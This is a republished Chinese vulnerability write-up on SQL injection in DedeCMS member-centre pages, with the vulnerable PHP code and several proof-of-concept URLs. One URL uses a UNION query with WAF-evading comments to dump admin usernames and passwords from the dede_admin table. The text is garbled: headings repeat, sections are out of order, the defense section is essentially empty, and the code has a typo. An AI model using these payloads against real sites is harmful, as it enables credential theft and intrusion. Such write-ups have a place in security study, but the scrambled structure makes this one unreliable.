dedecms /member/myfriend_group.php SQL Injection Vul

2019-07-03 作者:计算机教程   |   浏览(174)

catalog

catalog

1. 漏洞描述  2. 漏洞触发条件  3. 漏洞影响范围  4. 漏洞代码分析  5. 防御方法  6. 攻防思考
1. 漏洞描述  2. 漏洞触发条件  3. 漏洞影响范围  4. 漏洞代码分析  5. 防御方法  6. 攻防思考

 

 

1. 漏洞描述

1. 漏洞描述

Dedecms会员中心注入漏洞

Dedecms会员中心注入漏洞

**Relevant Link**

**Relevant Link**

http://exp.03sec.com/dedecms-会员中心注入漏洞10.shtml
http://www.05112.com/anquan/ldfb/sql/2014/0209/7723.html

2. 漏洞触发条件

2. 漏洞触发条件

1. 先打开: http://127.0.0.1/dedecms5.7/member/myfriend_group.php  2. 随便添加一个分组: group  //查看源码里groupname[]中的值,可以发现,这是一个基于键值key的盲注,因为没有返回,那么判断是否满足条件就看是否update了原来的数据  3. http://127.0.0.1/dedecms5.7/member/myfriend_group.php?dopost=save&groupname[2' or @`'` and (select 1)=1 and '1]=12222  //如果(select 1)=1的话 那个groupname就会被改成12222,上面的2改成你的groupname的ID

0x1: POC1

3. 漏洞影响范围
4. 漏洞代码分析

http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1' and char(@`'`) and 1=2 UniOn SelEct 1,2,3,4,5,6,7,8,9,10,11,12 #

/member/myfriend_group.php

0x2: POC2

elseif ($dopost == 'save')  {       if(isset($mtypeidarr) && is_array($mtypeidarr))       {           $delids = '0';           $mtypeidarr = array_filter($mtypeidarr, 'is_numeric');           foreach($mtypeidarr as $delid)           {               delids .= ','.$delid;               unset($groupname[$delid]);           }           $query = "DELETE FROM `dede_member_group` WHERE id in ($delids) AND              mid='$cfg_ml->M_ID'";           $dsql->ExecNoneQuery($query);           $sql="SELECT id FROM `dede_member_friends` WHERE groupid in              ($delids) AND mid='$cfg_ml->M_ID'";           $db->SetQuery($sql);           $db->Execute();           while($row = $db->GetArray())           {               $query2 = "UPDATE `dede_member_friends` SET groupid='1' WHERE id='{$row['id']}' AND mid='$cfg_ml->M_ID'";               $dsql->ExecNoneQuery($query2);           }       }       //键值$key注入      foreach ($groupname as $id => $name)      {           $name = HtmlReplace($name);           $query = "UPDATE `dede_member_group` SET groupname='$name' WHERE id='$id' AND mid='$cfg_ml->M_ID'";           echo $query;           $dsql->ExecuteNoneQuery($query);       }       ShowMsg('分组修改完成(删除分组中的会员会转移到默认分组中)','myfriend_group.php');  }

如果报错: Safe Alert: Request Error step 1 !

**Relevant Link**

http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1′and char(@`’`) and 1=2 /*!50000Union*/ /*!50000select*/ 1,2,3,4,5,6,userid,8,9,10,11,pwd from `dede_admin`#
http://www.wooyun.org/bugs/wooyun-2014-048923

0x3: POC3

5. 防御方法

报错注入

本文由www.2003.com发布于计算机教程,转载请注明出处:dedecms /member/myfriend_group.php SQL Injection Vul

关键词: